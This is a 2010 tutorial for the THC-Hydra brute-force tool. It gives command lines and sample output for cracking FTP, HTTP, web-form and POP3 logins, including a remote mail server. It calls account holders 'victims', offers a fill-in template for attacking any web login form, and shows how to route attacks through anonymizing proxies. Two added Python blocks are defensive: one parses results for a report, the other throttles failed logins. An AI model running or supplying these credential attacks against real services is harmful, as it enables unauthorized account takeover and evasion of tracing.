THC-Hydra Tutorial
_ _ _ _
| |_| |__ ___ | |__ _ _ __| |_ __ __ _
| __| '_ \ / __|____| '_ \| | | |/ _` | '__/ _` |
| |_| | | | (_|_____| | | | |_| | (_| | | | (_| |
\__|_| |_|\___| |_| |_|\__, |\__,_|_| \__,_|
|___/ BASIC THC-HYDRA TUTORIAL [PT-BR]
_________________________________________________________________________________
- By: MDH3LL
- Contact: [email protected]
- Date: 10/04/2010
_________________________________________________________________________________
INDEX:
_________________________________________________________________________________
-0x00 - Installing THC-HYDRA on Windows XP.
-0x01 - Running.
-0x02 - Options.
-0x03 - Examples:
-- Example (1) FTP
-- Example (2) http-head
-- Example (3) http-post-form
-- Example (4) POP3
-0x04 - Proxy.
_________________________________________________________________________________
* THC-Hydra: open source, cross-platform.
* Developed by a German organization called "The Hacker's Choice" (THC).
* The program can be obtained free of charge from the project's official site: http://freeworld.thc.org/thc-hydra/
Hydra uses a BRUTE FORCE (exhaustive search) mechanism:
this type of attack consists of making the program work exhaustively, trying combinations of
passwords and user names until it reaches its obvious goal.
Protocols currently supported in version 5.4:
TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL, REXEC,
RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS,
ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak, Cisco auth, Cisco enable
=================================================================================
[0x00] Installing THC-HYDRA on Windows XP:
=================================================================================
The first step is to download the Win32/Cygwin version of the program from the official site, unpack it and run it.
-> Create an environment variable under:
Control Panel > System > Advanced tab > Environment Variables, adding the directory to PATH.
example: C:\hydra-5.4-win;
=================================================================================
[0x01] Running:
=================================================================================
Run 'hydra' at the command prompt to invoke the program.
/////////////////////////////////////////////////////////////////////////////////
C:\Documents and Settings\user\Desktop>hydra
Hydra v5.4 [http://www.thc.org] (c) 2006 by van Hauser / THC
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT]
Options:
-R restore a previous aborted/crashed session
-S connect via SSL
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-e ns additional checks, "n" for null password, "s" try login as pass
-C FILE colon seperated "login:pass" format, instead of -L/-P options
-M FILE server list for parallel attacks, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f exit after the first found login/password pair (per host if -M)
-t TASKS run TASKS number of connects in parallel (default: 16)
-w TIME defines the max wait time in seconds for responses (default: 30)
-v / -V verbose mode / show login+pass combination for each attempt
server the target server (use either this OR the -M option)
service the service to crack. Supported protocols: telnet ftp pop3[-ntlm]
imap[-ntlm] smb smbnt http[s]-{head|get} http-{get|post}-form http-proxy cisco
cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5
rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere
teamspeak sip vmauthd
OPT some service modules need special input (see README!)
Use HYDRA_PROXY_HTTP/HYDRA_PROXY_CONNECT and HYDRA_PROXY_AUTH env for a proxy.
Hydra is a tool to guess/crack valid login/password pairs - use allowed only
for legal purposes! If used commercially, tool name, version and web address
must be mentioned in the report. Find the newest version at http://www.thc.org
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
As we can see above, when run it displays information such as the version, the usage syntax and
the options, each followed by a comment.
=================================================================================
[0x02] Options:
=================================================================================
-R Restores aborted/crashed sessions.
-S Secure connection using SSL, if needed.
-s Specifies the port hydra will connect to.
-l Victim's name|login.
-L Loads a list of victims' names|logins. (1 per line)
-p Specifies a single password.
-P Loads a list of passwords. (1 per line)
-e ns additional 'n' tests a blank password || additional 's' tests the user name as the password.
-C Used to load a file containing user:password. The user:password format is equivalent to -L/-P.
-M Loads a list of target servers. (1 per line)
-o Saves the passwords found to the file you specify.
-f Makes the program stop working when the password||user is found.
-t Limits the number of requests at a time. (default: 16)
-w Sets the maximum time in seconds to wait for a response from the server. (default: 30s)
-v / -V Verbose mode of the program. 'V' shows every attempt.
Server: Target server.
Examples:
127.0.0.1
localhost
pop.gmail.com
pop.mail.yahoo.com.br
pop3.live.com
Service: Protocol||Service that will be called|used.
Examples:
pop3
ftp
smtp
vnc
imap
http-head
http-post-form
=================================================================================
[0x03] Examples:
=================================================================================
I will put into practice the options already explained in section [0x02] of this tutorial.
Example (1) FTP
=================================================================================
Syntax:
---------------------------------------------------------------------------------
hydra -l root -P pass.txt -s 21 localhost ftp
---------------------------------------------------------------------------------
Output:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-08-17 21:23:57
[DATA] 16 tasks, 1 servers, 23 login tries (l:1/p:23), ~1 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 127.0.0.1 login: root password: chaw123
[STATUS] attack finished for localhost (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2009-08-17 21:24:34
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
*[21][ftp] host: 127.0.0.1 login: root password: chaw123 -> This output shows that the password chaw123,
belonging to the user root, was found.
Example (2) http-head
=================================================================================
Syntax:
---------------------------------------------------------------------------------
hydra -L users.txt -P pass.txt -o saida.txt localhost http-head /xampp/
---------------------------------------------------------------------------------
Output:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-28 00:40:56
[DATA] 16 tasks, 1 servers, 266 login tries (l:14/p:19), ~16 tries per task
[DATA] attacking service http-head on port 80
[80][www] host: 127.0.0.1 login: root password: Est2yu
[STATUS] attack finished for localhost (waiting for childs to finish)
select: Bad file descriptor
Hydra (http://www.thc.org) finished at 2010-01-28 00:41:00
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Hydra found user:root||password:Est2yu and did us the favour of saving it to the file 'saida.txt'.
The program wrote the following lines to the file:
---------------------------------------------------------------------------------
# Hydra v5.4 run at 2010-01-27 19:59:59 on localhost http-head (hydra -L users.txt -P
pass.txt -o saida.txt localhost http-head)
[80][www] host: 127.0.0.1 login: root password: Est2yu
---------------------------------------------------------------------------------
/xampp/ is the path -> http://localhost/xampp/
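The result-line format shown in saida.txt can be parsed into findings for a remediation report after an authorized test. This is an added example, not part of the original tutorial; the function names, the weakness labels and the two extra sample lines are assumptions.

```python
import re

# Result-line shape copied from the saida.txt contents shown above:
#   [80][www] host: 127.0.0.1 login: root password: Est2yu
RESULT = re.compile(
    r"^\[(?P<port>\d+)\]\[(?P<service>[^\]]+)\]\s+host:\s+(?P<host>\S+)"
    r"\s+login:\s+(?P<login>\S+)\s+password:\s*(?P<password>.*)$"
)

def weakness(login, password):
    """Name the policy failure that made the credential guessable."""
    if password == "":
        return "blank password"          # the case -e n tests
    if password.lower() == login.lower():
        return "password equals login"   # the case -e s tests
    if len(password) < 8 or password.isalpha() or password.isdigit():
        return "short or single-class password"
    return "password present in wordlist"

def parse_results(text):
    """Return one record per result line; comments and wrapped text are skipped."""
    records = []
    for raw in text.splitlines():
        m = RESULT.match(raw.strip())
        if m is None:
            continue
        rec = m.groupdict()
        rec["port"] = int(rec["port"])
        password = rec.pop("password")
        rec["weakness"] = weakness(rec["login"], password)
        # Keep only a masked form so the report does not spread the secret.
        rec["masked"] = password[:1] + "*" * max(len(password) - 1, 0)
        records.append(rec)
    return records

# Constructed sample: the file contents from this page plus two made-up lines.
SAMPLE = """\
# Hydra v5.4 run at 2010-01-27 19:59:59 on localhost http-head (hydra -L users.txt -P
pass.txt -o saida.txt localhost http-head)
[80][www] host: 127.0.0.1 login: root password: Est2yu
[21][ftp] host: 127.0.0.1 login: backup password: backup
[110][pop3] host: 127.0.0.1 login: guest password:
"""

if __name__ == "__main__":
    for r in parse_results(SAMPLE):
        print(r)
```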
Example (3) http-post-form
=================================================================================
Syntax:
---------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o saida.txt -t 1 -f 127.0.0.1
http-post-form "index.php:nome=^USER^&senha=^PASS^:invalido"
---------------------------------------------------------------------------------
Output:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-27 23:19:33
[DATA] 1 tasks, 1 servers, 19 login tries (l:1/p:19), ~19 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 127.0.0.1 login: admin password: admin
[STATUS] attack finished for 127.0.0.1 (valid pair found)
Hydra (http://www.thc.org) finished at 2010-01-27 23:19:33
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
-> To build this syntax I had to look at the page's source code >>
---------------------------------------------------------------------------------
---------------------------------------------------------------------------------
 __________________________________________________________
|__Mozilla Firefox___________________________________|-|_|X|
|                                                          |
|          _____________________________________           |
|         | nome                                |          |
|         |_____________________________________|          |
|          _____________________________________           |
|         | senha                               |          |
|         |_____________________________________|          |
|                                                          |
|                     ________________                     |
|                    |     Enviar     |                    |
|                    |________________|                    |
|                                                          |
|__________________________________________________________|
|_Concluído________________________________________________|
-> POST index.php nome=^USER^&senha=^PASS^&boo=Enviar
-> Use the 'Live HTTP Headers' add-on for Firefox, which will certainly make your life a lot easier.
-> When I send wrong data, the page returns 'invalido' in the title.
---------------------------------------------------------------------------------
invalido
---------------------------------------------------------------------------------
Fill in ->
---------------------------------------------------------------------------------
hydra -l [user] -P [password-list] -o saida.txt -t 1 -f [host] http-post-form
"[target]:[variable_name]=^USER^&[variable_name]=^PASS^:[error phrase]"
---------------------------------------------------------------------------------
Filled in ->
---------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o saida.txt -t 1 -f 127.0.0.1 http-post-form "index.php:nome=^USER^&senha=^PASS^:invalido"
---------------------------------------------------------------------------------
^USER^ and ^PASS^ will be filled in by hydra during the loop it runs, testing password by password.
-> ^USER^ = admin and ^PASS^ = $_ <-
- Another example -> http://localhost/login/login.html
-> Page source code >>
---------------------------------------------------------------------------------
---------------------------------------------------------------------------------
Syntax:
---------------------------------------------------------------------------------
hydra -l admin -P pass.txt localhost http-post-form "/login/login_vai.php:login=^USER^&senha=^PASS^:Senha inválida!"
---------------------------------------------------------------------------------
Output:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-04-11 00:31:02
[DATA] 1 tasks, 1 servers, 11 login tries (l:1/p:11), ~11 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 127.0.0.1 login: admin password: teste
[STATUS] attack finished for localhost (valid pair found)
Hydra (http://www.thc.org) finished at 2010-04-11 00:31:07
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Example (4) POP3
=================================================================================
Syntax:
---------------------------------------------------------------------------------
hydra -L users.txt -p 123456 -S pop3.xxx.com pop3
---------------------------------------------------------------------------------
Output:
/////////////////////////////////////////////////////////////////////////////////
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-28 00:55:28
[DATA] 9 tasks, 1 servers, 9 login tries (l:9/p:1), ~1 tries per task
[DATA] attacking service pop3 on port 110
[STATUS] attack finished for pop3.xxx.com (waiting for childs to finish)
[110][pop3] host: pop3.xxx.com login: [email protected] password: 123456
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
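The runs in Example (3) and Example (4) reach a login endpoint as a burst of failures against one account, or as one password tried across many accounts from one address. As an added example (not from the original tutorial), a server-side throttle that stops both; the class name, thresholds and sample traffic are assumptions.

```python
from collections import defaultdict, deque

class LoginThrottle:
    """Sliding-window failure counter kept per account and per source address."""
    def __init__(self, max_failures=5, window=300.0, lockout=900.0):
        self.max_failures, self.window, self.lockout = max_failures, window, lockout
        self._failures = defaultdict(deque)  # key -> times of recent failures
        self._locked_until = {}              # key -> time the block expires

    @staticmethod
    def _keys(user, ip):
        return ("user", user.lower()), ("ip", ip)

    def allowed(self, user, ip, now):
        return all(self._locked_until.get(k, 0.0) <= now for k in self._keys(user, ip))

    def record(self, user, ip, success, now):
        if success:
            # Reset the account counter only; the source's failure history stays.
            self._failures.pop(("user", user.lower()), None)
            return
        for key in self._keys(user, ip):
            q = self._failures[key]
            q.append(now)
            while q and q[0] <= now - self.window:
                q.popleft()
            if len(q) >= self.max_failures:
                self._locked_until[key] = now + self.lockout

def replay(attempts, throttle, check):
    """Run (time, ip, user, password) tuples through the throttle."""
    evaluated, rejected, found = 0, 0, []
    for now, ip, user, password in attempts:
        if not throttle.allowed(user, ip, now):
            rejected += 1  # refused before the password is even compared
            continue
        evaluated += 1
        ok = check(user, password)
        throttle.record(user, ip, ok, now)
        if ok:
            found.append((user, password))
    return evaluated, rejected, found

# Constructed traffic: 19 guesses at one account, then one password over 9 accounts.
ACCOUNTS = {"admin": "guess11", "user7": "123456"}
def check(user, password):
    return ACCOUNTS.get(user) == password
SINGLE = [(i * 0.05, "192.0.2.10", "admin", f"guess{i}") for i in range(19)]
SPRAY = [(i * 0.05, "192.0.2.20", f"user{i}", "123456") for i in range(9)]
print(replay(SINGLE, LoginThrottle(), check), replay(SPRAY, LoginThrottle(), check))
```

Because section [0x04] shows the tool can be routed through a proxy, the account key is what still counts failures when the source address changes. A hard lock on the account key lets anyone lock out a known user name, so it is common to use a delay or CAPTCHA there and keep hard blocks for the source key.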
=================================================================================
[0x04] Proxy:
=================================================================================
Web proxy:
---------------------------------------------------------------------------------
HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"
---------------------------------------------------------------------------------
For anything else use: HYDRA_PROXY_CONNECT
---------------------------------------------------------------------------------
HYDRA_PROXY_CONNECT=proxy.anonymizer.com:8000
---------------------------------------------------------------------------------
With authentication:
---------------------------------------------------------------------------------
HYDRA_PROXY_AUTH="nome:senha"
---------------------------------------------------------------------------------